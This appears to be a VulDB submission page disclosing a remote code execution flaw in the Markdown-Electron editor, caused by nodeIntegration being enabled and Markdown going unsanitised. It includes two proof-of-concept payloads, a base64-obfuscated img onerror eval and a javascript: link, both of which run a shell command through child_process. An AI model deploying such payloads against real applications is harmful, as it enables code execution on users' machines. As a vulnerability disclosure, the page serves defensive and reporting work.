Submit #92098: Incorrect electron configuration causes RCEinfo

TitleIncorrect electron configuration causes RCE
DescriptionnodeIntegration: true decide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE). EXP # 0 click <img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'> # 1 click <a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a> For more details, please click the announcement.
Source⚠️ https://github.com/JP1016/Markdown-Electron/issues/3
User
 Tom23 (UID 41413)
Submission02/20/2023 13:17 (3 years ago)
Moderation02/24/2023 09:00 (4 days later)
StatusAccepted
VulDB entry221738 [JP1016 Markdown-Electron code injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!